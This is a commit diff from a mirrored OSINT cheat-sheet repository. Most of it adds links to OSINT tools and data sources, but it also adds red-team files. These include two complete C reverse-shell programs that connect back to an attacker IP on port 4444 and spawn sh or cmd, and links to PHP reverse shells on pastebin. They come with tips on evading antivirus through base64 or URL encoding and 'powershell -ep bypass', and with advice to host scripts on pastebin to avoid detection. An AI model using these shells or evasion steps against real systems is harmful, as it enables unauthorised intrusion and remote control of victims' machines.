mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2026-02-28 06:13:00 -08:00
added resouces and scripts
This commit is contained in:
@@ -151,6 +151,7 @@ Be carefull using this tool
|
|||||||
- [Hoaxy](https://hoaxy.osome.iu.edu/)
|
- [Hoaxy](https://hoaxy.osome.iu.edu/)
|
||||||
- [Offensive OSINT](https://www.os-surveillance.io/#choose-plan)
|
- [Offensive OSINT](https://www.os-surveillance.io/#choose-plan)
|
||||||
- [botsentinel](https://botsentinel.com/dashboard)
|
- [botsentinel](https://botsentinel.com/dashboard)
|
||||||
|
- [keyhole](https://keyhole.co/)
|
||||||
|
|
||||||
# Collection Dataset
|
# Collection Dataset
|
||||||
|
|
||||||
@@ -194,6 +195,7 @@ Be carefull using this tool
|
|||||||
- [BNN ID](https://puslitdatin.bnn.go.id/portfolio/data-statistik-kasus-narkoba/)
|
- [BNN ID](https://puslitdatin.bnn.go.id/portfolio/data-statistik-kasus-narkoba/)
|
||||||
- [Microsoft Building Dataset](https://planetarycomputer.microsoft.com/dataset/ms-buildings)
|
- [Microsoft Building Dataset](https://planetarycomputer.microsoft.com/dataset/ms-buildings)
|
||||||
- [huggingface](https://huggingface.co/)
|
- [huggingface](https://huggingface.co/)
|
||||||
|
- [goodstats ID](https://goodstats.id/)
|
||||||
|
|
||||||
# Forums & Sites
|
# Forums & Sites
|
||||||
|
|
||||||
@@ -330,6 +332,7 @@ Site and forums OSINT community arround world
|
|||||||
|
|
||||||
Hastag and keyword analysis in search engine, social media or other platform (Text Intel)
|
Hastag and keyword analysis in search engine, social media or other platform (Text Intel)
|
||||||
|
|
||||||
|
- [keyhole](https://keyhole.co/)
|
||||||
- [brandmentions](https://app.brandmentions.com/)
|
- [brandmentions](https://app.brandmentions.com/)
|
||||||
- [wordtracker](https://www.wordtracker.com/)
|
- [wordtracker](https://www.wordtracker.com/)
|
||||||
- [keywordtool](https://keywordtool.io/)
|
- [keywordtool](https://keywordtool.io/)
|
||||||
@@ -2178,7 +2181,7 @@ Browser plugin that allows you to watch YouTube videos frame by frame.
|
|||||||
- [unwiredlabs](https://unwiredlabs.com/products)
|
- [unwiredlabs](https://unwiredlabs.com/products)
|
||||||
- [copernix](https://copernix.io/)
|
- [copernix](https://copernix.io/)
|
||||||
- [skydb DB for building](https://www.skydb.net/)
|
- [skydb DB for building](https://www.skydb.net/)
|
||||||
- [dataspace](https://browser.dataspace.copernicus.eu/)
|
- [dataspace copernicus EU](https://browser.dataspace.copernicus.eu/)
|
||||||
- [openinframap](https://openinframap.org/#2/57.92/72.82/L,O)
|
- [openinframap](https://openinframap.org/#2/57.92/72.82/L,O)
|
||||||
- [openseamap](https://map.openseamap.org/)
|
- [openseamap](https://map.openseamap.org/)
|
||||||
- [openstreetbrowser](https://openstreetbrowser.org/)
|
- [openstreetbrowser](https://openstreetbrowser.org/)
|
||||||
@@ -2689,6 +2692,7 @@ Social Network and blogging
|
|||||||
- [immuniweb](https://www.immuniweb.com/darkweb/)
|
- [immuniweb](https://www.immuniweb.com/darkweb/)
|
||||||
- [darknetlive](https://darknetlive.com/onions)
|
- [darknetlive](https://darknetlive.com/onions)
|
||||||
- [ransomwatch](https://ransomwatch.telemetry.ltd/#/)
|
- [ransomwatch](https://ransomwatch.telemetry.ltd/#/)
|
||||||
|
- [watchguard ransomtracker](https://www.watchguard.com/wgrd-security-hub/ransomware-tracker)
|
||||||
- [Ahmia Onion Site](http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/)
|
- [Ahmia Onion Site](http://juhanurmihxlp77nkq76byazcldy2hlmovfu2epvl5ankdibsot4csyd.onion/)
|
||||||
- [Haystak Onion Site](http://haystak5njsmn2hqkewecpaxetahtwhsbsa64jom2k22z5afxhnpxfid.onion/)
|
- [Haystak Onion Site](http://haystak5njsmn2hqkewecpaxetahtwhsbsa64jom2k22z5afxhnpxfid.onion/)
|
||||||
- [Dark Search Onion Site](http://darkschn4iw2hxvpv2vy2uoxwkvs2padb56t3h4wqztre6upoc5qwgid.onion)
|
- [Dark Search Onion Site](http://darkschn4iw2hxvpv2vy2uoxwkvs2padb56t3h4wqztre6upoc5qwgid.onion)
|
||||||
@@ -3585,6 +3589,7 @@ Awesome Burpsuite Extension
|
|||||||
C2 & C4
|
C2 & C4
|
||||||
|
|
||||||
- [cobaltstrike](https://www.cobaltstrike.com/)
|
- [cobaltstrike](https://www.cobaltstrike.com/)
|
||||||
|
- [bruteratel C4](https://bruteratel.com/tabs/tutorials/)
|
||||||
- [Ninja](https://github.com/ahmedkhlief/Ninja)
|
- [Ninja](https://github.com/ahmedkhlief/Ninja)
|
||||||
- [Poweshell Empire](https://bc-security.gitbook.io/empire-wiki)
|
- [Poweshell Empire](https://bc-security.gitbook.io/empire-wiki)
|
||||||
- [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
|
- [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
|
||||||
@@ -3857,6 +3862,7 @@ Resources and collection for your make tool OSINT
|
|||||||
|
|
||||||
# OSINT Branding & Verify
|
# OSINT Branding & Verify
|
||||||
|
|
||||||
|
- [keyhole](https://keyhole.co/)
|
||||||
- [Trus Pilot](https://www.trustpilot.com/)
|
- [Trus Pilot](https://www.trustpilot.com/)
|
||||||
- [Google Alert](https://www.google.com/alerts)
|
- [Google Alert](https://www.google.com/alerts)
|
||||||
- [White Pages](https://www.whitepages.com/)
|
- [White Pages](https://www.whitepages.com/)
|
||||||
|
|||||||
@@ -4,7 +4,7 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
|||||||
|
|
||||||
1. Make sure the target has internet access (internet access opened)
|
1. Make sure the target has internet access (internet access opened)
|
||||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||||
3. Encode your script using base64 and then decode it 3.
|
3. Encode your script using base64 and then decode it
|
||||||
4. Encode your script using url encode
|
4. Encode your script using url encode
|
||||||
|
|
||||||
## Script 1
|
## Script 1
|
||||||
|
|||||||
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
84
Script/Red Team/C Script/Reverse-shell.md
Normal file
@@ -0,0 +1,84 @@
|
|||||||
|
# TIPS
|
||||||
|
|
||||||
|
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||||
|
|
||||||
|
1. Make sure the target has internet access (internet access opened)
|
||||||
|
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||||
|
3. Encode your script using base64 and then decode it
|
||||||
|
4. Encode your script using url encode
|
||||||
|
5. Check the compiler
|
||||||
|
|
||||||
|
|
||||||
|
## C script spawning shell
|
||||||
|
|
||||||
|
``` Linux
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
int port = 4444;
|
||||||
|
struct sockaddr_in revsockaddr;
|
||||||
|
|
||||||
|
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||||
|
revsockaddr.sin_family = AF_INET;
|
||||||
|
revsockaddr.sin_port = htons(port);
|
||||||
|
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
|
||||||
|
|
||||||
|
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||||
|
sizeof(revsockaddr));
|
||||||
|
dup2(sockt, 0);
|
||||||
|
dup2(sockt, 1);
|
||||||
|
dup2(sockt, 2);
|
||||||
|
|
||||||
|
char * const argv[] = {"sh", NULL};
|
||||||
|
execvp("sh", argv);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
## C spawning cmd
|
||||||
|
|
||||||
|
```Windows
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <sys/socket.h>
|
||||||
|
#include <sys/types.h>
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
#include <netinet/in.h>
|
||||||
|
#include <arpa/inet.h>
|
||||||
|
|
||||||
|
int main(void){
|
||||||
|
int port = 4444;
|
||||||
|
struct sockaddr_in revsockaddr;
|
||||||
|
|
||||||
|
int sockt = socket(AF_INET, SOCK_STREAM, 0);
|
||||||
|
revsockaddr.sin_family = AF_INET;
|
||||||
|
revsockaddr.sin_port = htons(port);
|
||||||
|
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
|
||||||
|
|
||||||
|
connect(sockt, (struct sockaddr *) &revsockaddr,
|
||||||
|
sizeof(revsockaddr));
|
||||||
|
dup2(sockt, 0);
|
||||||
|
dup2(sockt, 1);
|
||||||
|
dup2(sockt, 2);
|
||||||
|
|
||||||
|
char * const argv[] = {"cmd", NULL};
|
||||||
|
execvp("cmd", argv);
|
||||||
|
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
*Pro tips
|
||||||
|
|
||||||
|
- If you was gett the shell, change to powershell, you can run
|
||||||
|
|
||||||
|
```
|
||||||
|
powershell -ep bypass
|
||||||
|
```
|
||||||
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
21
Script/Red Team/Php scripts/Revershe-shell.md
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
# TIPS
|
||||||
|
|
||||||
|
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
|
||||||
|
|
||||||
|
1. Make sure the target has internet access (internet access opened)
|
||||||
|
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||||
|
3. Encode your script using base64 and then decode it
|
||||||
|
4. Encode your script using url encode
|
||||||
|
5. Check the compiler
|
||||||
|
|
||||||
|
## Php spawning cmd
|
||||||
|
|
||||||
|
```Windows
|
||||||
|
https://pastebin.com/bFqVuGwv
|
||||||
|
```
|
||||||
|
|
||||||
|
## Php spawning bash
|
||||||
|
|
||||||
|
```Linux
|
||||||
|
https://pastebin.com/QsSKm2F1
|
||||||
|
```
|
||||||
@@ -4,8 +4,9 @@ If you have obtained a vulnerability such as RCE, file upload or something else,
|
|||||||
|
|
||||||
1. Make sure the target has internet access (internet access opened)
|
1. Make sure the target has internet access (internet access opened)
|
||||||
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
2. Try changing the port to a larger one such as 8080, 8888, etc.
|
||||||
3. Encode your script using base64 and then decode it 3.
|
3. Encode your script using base64 and then decode it
|
||||||
4. Encode your script using url encode
|
4. Encode your script using url encode
|
||||||
|
5. Check the compiler
|
||||||
|
|
||||||
## Script 1
|
## Script 1
|
||||||
|
|
||||||
|
|||||||
@@ -1,3 +1,16 @@
|
|||||||
# Red Teaming
|
# Red Teaming
|
||||||
|
|
||||||
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips
|
||||||
|
|
||||||
|
## Tips Reverse Shell
|
||||||
|
|
||||||
|
1. Check the operating system target
|
||||||
|
2. Check the network or internet access on the target (internet access opened)
|
||||||
|
3. Cehck the vuln, you can check it by run the command like sleep, delay or trying to wget on your local machine
|
||||||
|
4. Check is it a sandbox like in a container? Or directly to the operating system. If it's a container then you have to bypass
|
||||||
|
5. Check the installed software on the target
|
||||||
|
6. Check the compiler on the target
|
||||||
|
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
||||||
|
8. Change the port listener to bigger
|
||||||
|
|
||||||
|
## Soon will added (tamplate )
|
||||||
@@ -1,6 +1,7 @@
|
|||||||
# Awesome Collection Sentinel Script
|
# Awesome Collection Sentinel Script
|
||||||
|
|
||||||
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
|
- [sentinel collection script](https://custom-scripts.sentinel-hub.com/)
|
||||||
|
- [sentinel custom script Github](https://github.com/sentinel-hub/custom-scripts)
|
||||||
|
|
||||||
# Guide
|
# Guide
|
||||||
|
|
||||||
|
|||||||
@@ -48,6 +48,10 @@ If you want change the repo for web based and create like node, data list, searc
|
|||||||
|
|
||||||
# Script
|
# Script
|
||||||
|
|
||||||
|
## Readme
|
||||||
|
|
||||||
|
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.
|
||||||
|
|
||||||
## Format
|
## Format
|
||||||
|
|
||||||
- Decide what script you're creating and what it's for.
|
- Decide what script you're creating and what it's for.
|
||||||
@@ -67,3 +71,5 @@ Red Team - Python Scripts
|
|||||||
>
|
>
|
||||||
|
|
||||||
or you can also create new folder on this script path
|
or you can also create new folder on this script path
|
||||||
|
|
||||||
|
*Notes for script: To avoid AV detection and abusive access to your computer, you can publish your scripts via pastebin, ghostbin or others.
|
||||||
Reference in New Issue
Block a user